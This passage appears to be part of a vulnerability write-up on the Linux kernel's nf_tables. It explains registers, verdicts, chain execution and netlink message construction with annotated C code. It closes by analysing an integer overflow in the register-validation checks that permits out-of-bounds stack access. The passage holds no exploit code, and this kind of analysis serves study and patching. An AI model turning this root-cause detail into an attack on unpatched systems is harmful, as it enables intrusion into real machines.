<h3 id="2-1-3-table"><a href="#2-1-3-table" class="headerlink" title="2.1.3 table"></a>2.1.3 table</h3><p>A table is the top-level structure of nf_tables and contains multiple chains. A chain can only jump to other chains in the same table.</p>
<p>Every table belongs to a family, which determines which kinds of packets the table processes. The families are ip, ip6, inet, arp, bridge, and netdev.</p>
<p>A table in the ip family handles only IPv4 packets, a table in the ip6 family handles only IPv6 packets, and a table in the inet family handles both IPv4 and IPv6 packets.</p>
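<h3 id="2-1-4-expression"><a href="#2-1-4-expression" class="headerlink" title="2.1.4 expression"></a>2.1.4 expression</h3><p>In fact, a rule can be subdivided further into multiple expressions; an expression is like a concrete instruction applied to the packet. User-facing tools generally do not expose the expression abstraction; it mainly shows up in kernel code.</p>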
<p>For the rule udp dport 50001 drop, one expression first checks whether the protocol is UDP, another checks whether the port is 50001, and if all preceding expressions pass, a final expression sets the verdict to drop so that the packet is discarded.</p>
<p>Each expression type is bound to an instance of struct nft_expr_ops, for example the immediate expression:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_expr_ops</span> <span class="title">nft_imm_ops</span> = {</span></span><br><span class="line"> .type = &nft_imm_type, <span class="comment">// expression type</span></span><br><span class="line"> .<span class="built_in">size</span> = NFT_EXPR_SIZE(<span class="keyword">sizeof</span>(struct nft_immediate_expr)),</span><br><span class="line"> .eval = nft_immediate_eval, <span class="comment">// called when the expression is executed</span></span><br><span class="line"> .init = nft_immediate_init, <span class="comment">// called when the expression is initialized</span></span><br><span class="line"> .activate = nft_immediate_activate,</span><br><span class="line"> .deactivate = nft_immediate_deactivate,</span><br><span class="line"> .destroy = nft_immediate_destroy,</span><br><span class="line"> .dump = nft_immediate_dump,</span><br><span class="line"> .validate = nft_immediate_validate,</span><br><span class="line"> .reduce = nft_immediate_reduce,</span><br><span class="line"> .offload = nft_immediate_offload,</span><br><span class="line"> .offload_action = nft_immediate_offload_action,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>Whenever a rule is added, the init function of each of its expressions is called.</p>
<p>Whenever an expression is executed, its eval function is called.</p>
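<h3 id="2-1-5-register"><a href="#2-1-5-register" class="headerlink" title="2.1.5 register"></a>2.1.5 register</h3><p>While operating on a packet, expressions need memory to hold intermediate data; this memory is the registers. In the kernel implementation all registers live on the stack and are contiguous in memory.</p>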
<p>Expressions can read or modify register data, and a single access can target either one register or several consecutive registers, so the registers can be viewed as one contiguous buffer.</p>
<p>Registers are addressed by index. The register indices defined in the kernel are:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> nft_registers {</span><br><span class="line"> NFT_REG_VERDICT,</span><br><span class="line"> NFT_REG_1,</span><br><span class="line"> NFT_REG_2,</span><br><span class="line"> NFT_REG_3,</span><br><span class="line"> NFT_REG_4,</span><br><span class="line"> __NFT_REG_MAX,</span><br><span class="line"></span><br><span class="line"> NFT_REG32_00 = <span class="number">8</span>,</span><br><span class="line"> NFT_REG32_01,</span><br><span class="line"> NFT_REG32_02,</span><br><span class="line"> ...</span><br><span class="line"> NFT_REG32_13,</span><br><span class="line"> NFT_REG32_14,</span><br><span class="line"> NFT_REG32_15,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>There are two ways to index registers. One is NFT_REG_1 to NFT_REG_4: 4 registers of 16 bytes each. The other is NFT_REG32_00 to NFT_REG32_15: 16 registers of 4 bytes each. In both schemes NFT_REG_VERDICT refers to the verdict register, which is 16 bytes. Both schemes address the same memory, so the total size is 16 + 4 * 16 = 16 + 16 * 4 = 80 bytes either way.</p>
<p><img src="images/01.png" alt></p>
<p>The verdict register comes first in memory. After each rule runs, the verdict register holds the decision about what happens next. It can take the following values:</p>
<table>
<thead>
<tr>
<th>verdict</th>
<th>Effect</th>
</tr>
</thead>
<tbody><tr>
<td>NFT_CONTINUE</td>
<td>The default verdict; continue with the next expression.</td>
</tr>
<tr>
<td>NFT_BREAK</td>
<td>Skip the remaining expressions of this rule and continue with the next rule.</td>
</tr>
<tr>
<td>NF_DROP</td>
<td>Drop the packet and stop execution.</td>
</tr>
<tr>
<td>NF_ACCEPT</td>
<td>Accept the packet and stop execution.</td>
</tr>
<tr>
<td>NFT_GOTO</td>
<td>Jump to another chain and never return.</td>
</tr>
<tr>
<td>NFT_JUMP</td>
<td>Jump to another chain; once that chain finishes with verdict NFT_CONTINUE, return to the original chain and continue from the next rule.</td>
</tr>
</tbody></table>
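<h3 id="2-1-6-nft-do-chain"><a href="#2-1-6-nft-do-chain" class="headerlink" title="2.1.6 nft_do_chain"></a>2.1.6 nft_do_chain</h3><p>nft_do_chain implements the logic that executes, in order, every expression of every rule in a base chain (and in any chain it jumps to). Below is the function's code with many explanatory comments added:</p>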
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span></span><br><span class="line">nft_do_chain(struct nft_pktinfo *pkt, <span class="keyword">void</span> *priv)</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_chain</span> *<span class="title">chain</span> = <span class="title">priv</span>, *<span class="title">basechain</span> = <span class="title">chain</span>;</span></span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_rule_dp</span> *<span class="title">rule</span>, *<span class="title">last_rule</span>;</span></span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">net</span> *<span class="title">net</span> = <span class="title">nft_net</span>(<span class="title">pkt</span>);</span></span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">nft_expr</span> *<span class="title">expr</span>, *<span class="title">last</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_regs</span> <span class="title">regs</span>;</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> stackptr = <span class="number">0</span>;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_jumpstack</span> <span class="title">jumpstack</span>[<span class="title">NFT_JUMP_STACK_SIZE</span>];</span></span><br><span class="line"> <span class="keyword">bool</span> genbit = READ_ONCE(net->nft.gencursor);</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_rule_blob</span> *<span class="title">blob</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">nft_traceinfo</span> <span class="title">info</span>;</span></span><br><span class="line"></span><br><span class="line"> info.trace = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">if</span> (static_branch_unlikely(&nft_trace_enabled))</span><br><span class="line"> nft_trace_init(&info, pkt, &regs.verdict, basechain);</span><br><span class="line">do_chain:</span><br><span class="line"> <span class="keyword">if</span> (genbit)</span><br><span class="line"> blob = rcu_dereference(chain->blob_gen_1);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> blob = rcu_dereference(chain->blob_gen_0);</span><br><span class="line"></span><br><span class="line"> rule = (struct nft_rule_dp *)blob->data;</span><br><span class="line"> <span class="comment">/* one past the last rule: marks where the rule loop below stops */</span></span><br><span class="line"> last_rule = (<span class="keyword">void</span> *)blob->data + blob-><span class="built_in">size</span>;</span><br><span class="line">next_rule: <span class="comment">// reached both when entering a new chain and when returning to a previous one</span></span><br><span class="line"> regs.verdict.code = NFT_CONTINUE; <span class="comment">// the default verdict code = NFT_CONTINUE</span></span><br><span class="line"> <span class="keyword">for</span> (; rule < last_rule; rule = nft_rule_next(rule)) { <span class="comment">// iterate through the rules</span></span><br><span class="line"> <span class="comment">/* iterate through the expressions */</span></span><br><span class="line"> nft_rule_dp_for_each_expr(expr, last, rule) {</span><br><span class="line"> <span class="comment">// execute the expression</span></span><br><span class="line"> <span class="keyword">if</span> (expr->ops == &nft_cmp_fast_ops)</span><br><span class="line"> nft_cmp_fast_eval(expr, &regs);</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (expr->ops == &nft_cmp16_fast_ops)</span><br><span class="line"> nft_cmp16_fast_eval(expr, &regs);</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (expr->ops == &nft_bitwise_fast_ops)</span><br><span class="line"> nft_bitwise_fast_eval(expr, &regs);</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (expr->ops != &nft_payload_fast_ops ||</span><br><span class="line"> !nft_payload_fast_eval(expr, &regs, pkt))</span><br><span class="line"> expr_call_ops_eval(expr, &regs, pkt);</span><br><span class="line"> <span class="comment">/* a verdict other than NFT_CONTINUE skips the rest of this rule's expressions */</span></span><br><span class="line"> <span class="keyword">if</span> (regs.verdict.code != NFT_CONTINUE) </span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// a rule has finished: check the verdict;</span></span><br><span class="line"> <span class="comment">// anything other than NFT_BREAK or NFT_CONTINUE stops this chain's remaining rules</span></span><br><span class="line"> <span class="keyword">switch</span> (regs.verdict.code) { </span><br><span class="line"> <span class="keyword">case</span> NFT_BREAK: </span><br><span class="line"> <span class="comment">// NFT_BREAK: reset the verdict to NFT_CONTINUE.</span></span><br><span class="line"> <span class="comment">// Like NFT_CONTINUE, NFT_BREAK moves on to the next rule;</span></span><br><span class="line"> <span class="comment">// the only difference is that it skipped the rest of the current rule's expressions.</span></span><br><span class="line"> regs.verdict.code = NFT_CONTINUE;</span><br><span class="line"> nft_trace_copy_nftrace(pkt, &info);</span><br><span class="line"> <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">case</span> NFT_CONTINUE:</span><br><span class="line"> <span class="comment">// every expression of the current rule has run,</span></span><br><span class="line"> <span class="comment">// so simply continue with the next rule.</span></span><br><span class="line"> nft_trace_packet(pkt, &info, chain, rule,</span><br><span class="line"> NFT_TRACETYPE_RULE);</span><br><span class="line"> <span class="keyword">continue</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// any verdict other than NFT_BREAK or NFT_CONTINUE:</span></span><br><span class="line"> <span class="comment">// skip the remaining rules and stop executing this chain.</span></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> nft_trace_verdict(&info, chain, rule, &regs);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// a chain has finished executing;</span></span><br><span class="line"> <span class="comment">// the verdict decides what happens next</span></span><br><span class="line"> <span class="keyword">switch</span> (regs.verdict.code & NF_VERDICT_MASK) {</span><br><span class="line"> <span class="keyword">case</span> NF_ACCEPT:</span><br><span class="line"> <span class="keyword">case</span> NF_DROP:</span><br><span class="line"> <span class="keyword">case</span> NF_QUEUE:</span><br><span class="line"> <span class="keyword">case</span> NF_STOLEN:</span><br><span class="line"> <span class="comment">// the packet's fate is decided: just return the verdict.</span></span><br><span class="line"> <span class="keyword">return</span> regs.verdict.code;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// no final decision for the packet yet: keep going.</span></span><br><span class="line"> <span class="keyword">switch</span> (regs.verdict.code) {</span><br><span class="line"> <span class="keyword">case</span> NFT_JUMP: </span><br><span class="line"> <span class="comment">// jump to another chain, saving what is needed to come back on the jumpstack;</span></span><br><span class="line"> <span class="comment">// on return, execution resumes at the rule after the current one</span></span><br><span class="line"> <span class="keyword">if</span> (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))</span><br><span class="line"> <span class="keyword">return</span> NF_DROP;</span><br><span class="line"> jumpstack[stackptr].chain = chain;</span><br><span class="line"> jumpstack[stackptr].rule = nft_rule_next(rule);</span><br><span class="line"> jumpstack[stackptr].last_rule = last_rule;</span><br><span class="line"> stackptr++;</span><br><span class="line"> fallthrough;</span><br><span class="line"> <span class="keyword">case</span> NFT_GOTO:</span><br><span class="line"> <span class="comment">// jump to another chain without coming back</span></span><br><span class="line"> chain = regs.verdict.chain;</span><br><span class="line"> <span class="keyword">goto</span> do_chain;</span><br><span class="line"> <span class="keyword">case</span> NFT_CONTINUE: <span class="comment">// end of this chain reached without a final verdict</span></span><br><span class="line"> <span class="keyword">case</span> NFT_RETURN: <span class="comment">// return to the chain that jumped here</span></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> WARN_ON_ONCE(<span class="number">1</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> nft_base_chain(basechain)->policy;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
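<p>The verdict register is checked each time an expression, a rule, or a chain finishes executing.</p>
<p>After an expression: any verdict other than NFT_CONTINUE prevents the rule's remaining expressions from running.</p>
<p>After a rule: any verdict other than NFT_BREAK or NFT_CONTINUE prevents the chain's remaining rules from running.</p>
<p>After a chain: if the packet's fate has already been decided (NF_ACCEPT, NF_DROP, NF_QUEUE or NF_STOLEN), execution stops. Otherwise the verdict (NFT_JUMP, NFT_GOTO, NFT_CONTINUE or NFT_RETURN) determines where control goes next.</p>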
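<p>The three levels of checking can be modelled with a small user-space sketch. This is not kernel code: the verdict names (V_CONTINUE, V_BREAK, ...), the port-matching "expressions", demo_rules and run_chain are hypothetical simplifications, and jumps (NFT_JUMP, NFT_GOTO, NFT_RETURN) are left out. A failed comparison returns V_BREAK, mirroring how nft_cmp sets NFT_BREAK on a mismatch.</p>

```c
#include <stddef.h>

#define MAX_EXPRS 4

/* Hypothetical, simplified verdict codes loosely modelled on nf_tables. */
enum verdict { V_CONTINUE, V_BREAK, V_ACCEPT, V_DROP };

/* An "expression" inspects the packet (reduced here to a port number). */
typedef enum verdict (*expr_fn)(int port);

/* A rule is a NULL-terminated list of at most MAX_EXPRS expressions. */
struct rule { expr_fn exprs[MAX_EXPRS]; };

/* Comparisons: CONTINUE on match, BREAK on mismatch (like nft_cmp). */
static enum verdict cmp_port_22(int port) { return port == 22 ? V_CONTINUE : V_BREAK; }
static enum verdict cmp_port_80(int port) { return port == 80 ? V_CONTINUE : V_BREAK; }
static enum verdict set_accept(int port) { (void)port; return V_ACCEPT; }
static enum verdict set_drop(int port)   { (void)port; return V_DROP; }

static enum verdict run_chain(const struct rule *rules, size_t nrules,
                              int port, enum verdict policy)
{
    for (size_t r = 0; r < nrules; r++) {
        enum verdict v = V_CONTINUE;

        /* expression level: stop the rule at the first non-CONTINUE verdict */
        for (size_t e = 0; e < MAX_EXPRS && rules[r].exprs[e] != NULL; e++) {
            v = rules[r].exprs[e](port);
            if (v != V_CONTINUE)
                break;
        }

        /* rule level: BREAK and CONTINUE both move on to the next rule */
        if (v == V_BREAK || v == V_CONTINUE)
            continue;

        /* any other verdict ends the chain */
        return v;
    }
    /* chain level: no rule decided, so the base chain's policy applies */
    return policy;
}

static const struct rule demo_rules[] = {
    { { cmp_port_22, set_drop, NULL } },
    { { cmp_port_80, set_accept, NULL } },
};
```

<p>With demo_rules, port 22 is dropped by the first rule; port 80 fails the first rule's comparison (V_BREAK), moves on, and is accepted by the second; any other port falls through to the policy passed in.</p>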
<h3 id="2-1-7-expression种类"><a href="#2-1-7-expression种类" class="headerlink" title="2.1.7 expression种类"></a>2.1.7 Expression types</h3><p>Below are some common expression types, with a short description of what each one does:</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Purpose</th>
</tr>
</thead>
<tbody><tr>
<td>nft_immediate_expr</td>
<td>Stores a constant value in a register.</td>
</tr>
<tr>
<td>nft_payload</td>
<td>Copies data from the packet into a register.</td>
</tr>
<tr>
<td>nft_payload_set</td>
<td>Overwrites part of the packet with the data held in a register.</td>
</tr>
<tr>
<td>nft_cmp_expr</td>
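<td>Compares register data with a constant and, depending on the result, changes the execution flow (on a mismatch it sets the verdict to NFT_BREAK).</td>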
</tr>
<tr>
<td>nft_bitwise</td>
<td>Performs bitwise operations on register data, such as shifts or XOR.</td>
</tr>
<tr>
<td>nft_range_expr</td>
<td>Similar to nft_cmp_expr, but checks whether register data falls within a range [from, to]; the operand can span several 32-bit registers.</td>
</tr>
</tbody></table>
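<h2 id="2-2-netlink"><a href="#2-2-netlink" class="headerlink" title="2.2 netlink"></a>2.2 netlink</h2><p>Interacting with nf_tables requires netlink. Netlink is a common mechanism for communicating with the Linux kernel, used especially heavily by the networking subsystem, and it was designed to overcome some of the drawbacks of ioctl.</p>
<p>Netlink communication uses sockets of the AF_NETLINK family. Every kernel component that uses netlink implements a netlink protocol; nf_tables is reached through the NETLINK_NETFILTER protocol, which is implemented by nfnetlink and under which nf_tables registers as a subsystem. So, to talk to nf_tables, it is enough to create the following socket:</p>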
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER);</span><br></pre></td></tr></table></figure>
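<p>When such a netlink socket is created, the kernel also tries to load the module implementing the protocol automatically, provided modprobe and the .ko file are in the expected locations.</p>
<p>Once the socket exists, messages are sent to it with sendmsg and received from it with recvmsg, which is how user space communicates with nf_tables.</p>
<p>The message structure passed to sendmsg is:</p>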
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">msghdr</span> {</span></span><br><span class="line"> <span class="keyword">void</span> *msg_name; <span class="comment">/* Optional address */</span></span><br><span class="line"> <span class="keyword">socklen_t</span> msg_namelen; <span class="comment">/* Size of address */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">iovec</span> *<span class="title">msg_iov</span>;</span> <span class="comment">/* Scatter/gather array */</span></span><br><span class="line"> <span class="keyword">size_t</span> msg_iovlen; <span class="comment">/* # elements in msg_iov */</span></span><br><span class="line"> <span class="keyword">void</span> *msg_control; <span class="comment">/* Ancillary data, see below */</span></span><br><span class="line"> <span class="keyword">size_t</span> msg_controllen; <span class="comment">/* Ancillary data buffer len */</span></span><br><span class="line"> <span class="keyword">int</span> msg_flags; <span class="comment">/* Flags (unused) */</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>The message content is held in the iovec array that the msg_iov field points to.</p>
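<p>A minimal sketch of how these fields are typically filled in for netlink, assuming the message has already been built in a buffer. prepare_kernel_msg is a hypothetical helper, not a library function: it points a single iovec at the buffer and addresses the message to the kernel, whose netlink port ID is 0.</p>

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <linux/netlink.h>

/*
 * Wrap an already-built netlink message (buf, len) in a struct msghdr
 * addressed to the kernel, ready for sendmsg(fd, msg, 0).
 * dst and iov are owned by the caller and must outlive the sendmsg call.
 */
static void prepare_kernel_msg(struct msghdr *msg, struct iovec *iov,
                               struct sockaddr_nl *dst, void *buf, size_t len)
{
    memset(dst, 0, sizeof(*dst));
    dst->nl_family = AF_NETLINK;
    dst->nl_pid = 0;                  /* port ID 0 = the kernel */
    dst->nl_groups = 0;               /* unicast, no multicast groups */

    iov->iov_base = buf;              /* the netlink message itself */
    iov->iov_len = len;

    memset(msg, 0, sizeof(*msg));
    msg->msg_name = dst;              /* optional destination address */
    msg->msg_namelen = sizeof(*dst);
    msg->msg_iov = iov;               /* scatter/gather array ... */
    msg->msg_iovlen = 1;              /* ... with a single element */
}
```

<p>The result can then be passed to sendmsg(fd, &amp;msg, 0) on the NETLINK_NETFILTER socket; replies are read with recvmsg using a msghdr prepared the same way around a receive buffer.</p>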
<p>For a netlink message, the buffer described by the iovec begins with a struct nlmsghdr:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">nlmsghdr</span> {</span></span><br><span class="line"> __u32 nlmsg_len; <span class="comment">/* Length of message including header */</span></span><br><span class="line"> __u16 nlmsg_type; <span class="comment">/* Message content */</span></span><br><span class="line"> __u16 nlmsg_flags; <span class="comment">/* Additional flags */</span></span><br><span class="line"> __u32 nlmsg_seq; <span class="comment">/* Sequence number */</span></span><br><span class="line"> __u32 nlmsg_pid; <span class="comment">/* Sending process port ID */</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
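<p>struct nlmsghdr is usually followed immediately by a header defined by the specific protocol (for NETLINK_NETFILTER this is struct nfgenmsg); these headers differ greatly from protocol to protocol.</p>
<p>The protocol header is followed by a sequence of attributes, each of which starts with the following header:</p>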
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">nlattr</span> {</span></span><br><span class="line"> __u16 nla_len;</span><br><span class="line"> __u16 nla_type;</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
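<p>The attribute's actual payload follows directly after this header. nla_len covers the header plus the payload, and each attribute is padded to a 4-byte boundary.</p>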
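<p>To make the layout concrete, here is a hedged sketch that builds a single nf_tables message by hand: a struct nlmsghdr, then the nfnetlink protocol header struct nfgenmsg, then one NFTA_TABLE_NAME attribute. It relies on the Linux UAPI headers; the function name build_newtable_msg and the choice of the inet table family are illustrative assumptions. Real nf_tables requests are additionally wrapped in an NFNL_MSG_BATCH_BEGIN / NFNL_MSG_BATCH_END batch, which this sketch omits.</p>

```c
#include <stdint.h>
#include <string.h>
#include <linux/netlink.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

/*
 * Layout: struct nlmsghdr | struct nfgenmsg | struct nlattr + table name.
 * Returns the total message length, or 0 if cap is too small.
 */
static size_t build_newtable_msg(void *buf, size_t cap, const char *name, uint32_t seq)
{
    size_t name_len = strlen(name) + 1;               /* include the NUL */
    size_t attr_len = NLA_HDRLEN + name_len;          /* nla_len: header + payload */
    size_t total = NLMSG_HDRLEN
                 + NLMSG_ALIGN(sizeof(struct nfgenmsg))
                 + NLA_ALIGN(attr_len);               /* attribute padded to 4 bytes */

    if (total > cap)
        return 0;
    memset(buf, 0, total);

    struct nlmsghdr *nlh = buf;
    nlh->nlmsg_len = total;
    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    nlh->nlmsg_seq = seq;
    nlh->nlmsg_pid = 0;

    struct nfgenmsg *nfg = NLMSG_DATA(nlh);           /* protocol-specific header */
    nfg->nfgen_family = 1;                            /* NFPROTO_INET ("inet" tables) */
    nfg->version = NFNETLINK_V0;
    nfg->res_id = 0;

    struct nlattr *nla = (struct nlattr *)((char *)nfg + NLMSG_ALIGN(sizeof(*nfg)));
    nla->nla_len = attr_len;
    nla->nla_type = NFTA_TABLE_NAME;
    memcpy((char *)nla + NLA_HDRLEN, name, name_len); /* payload follows the header */

    return total;
}
```

<p>For the name "demo" this gives 16 bytes (nlmsghdr) + 4 bytes (nfgenmsg) + 12 bytes (a 9-byte attribute padded to 4 bytes), i.e. 32 bytes in total.</p>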
<h1 id="三、漏洞成因"><a href="#三、漏洞成因" class="headerlink" title="三、漏洞成因"></a>3. Root cause</h1><p>The bug is an integer overflow that leads to an out-of-bounds access on the stack. It is present in both nft_validate_register_store and nft_validate_register_load; the explanation below uses nft_validate_register_load only, since the situation in nft_validate_register_store is essentially the same.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* net/netfilter/nf_tables_api.c */</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">nft_validate_register_load</span><span class="params">(<span class="keyword">enum</span> nft_registers reg, <span class="keyword">unsigned</span> <span class="keyword">int</span> len)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="comment">// reject reads from the verdict register, which are not allowed</span></span><br><span class="line"> <span class="keyword">if</span> (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)</span><br><span class="line"> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"> <span class="keyword">if</span> (len == <span class="number">0</span>) <span class="comment">// len must not be 0</span></span><br><span class="line"> <span class="keyword">return</span> -EINVAL;</span><br><span class="line"> <span class="comment">// reg's range is never restricted, so this 32-bit sum can overflow (wrap around)</span></span><br><span class="line"> <span class="keyword">if</span> (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))</span><br><span class="line"> <span class="keyword">return</span> -ERANGE;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Because the range of reg is not properly restricted, reg * NFT_REG32_SIZE + len can overflow: the expression is evaluated in 32-bit unsigned arithmetic, so a sufficiently large reg makes the sum wrap around to a small value that passes the check.</p>
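<p>The wraparound is easy to reproduce in user space. The sketch below restates the check with the 32-bit unsigned arithmetic made explicit. NFT_REG_SIZE = 16 and NFT_REG32_SIZE = 4 are the UAPI values quoted in the nft_parse_register excerpt; REGS_DATA_SIZE = 80 is an assumption standing in for sizeof_field(struct nft_regs, data) (20 u32 slots), and the negative return codes are simplified stand-ins for -EINVAL and -ERANGE.</p>

```c
#include <stdint.h>

#define NFT_REG_1        1
#define NFT_REG_SIZE     16
#define NFT_REG32_SIZE   4
#define REGS_DATA_SIZE   80   /* assumed sizeof_field(struct nft_regs, data) */

/* User-space restatement of the vulnerable nft_validate_register_load check. */
static int validate_register_load(uint32_t reg, uint32_t len)
{
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -1;                               /* -EINVAL: verdict register */
    if (len == 0)
        return -1;                               /* -EINVAL: empty load */

    uint32_t end = reg * NFT_REG32_SIZE + len;   /* wraps modulo 2^32 */
    if (end > REGS_DATA_SIZE)
        return -2;                               /* -ERANGE */
    return 0;
}
```

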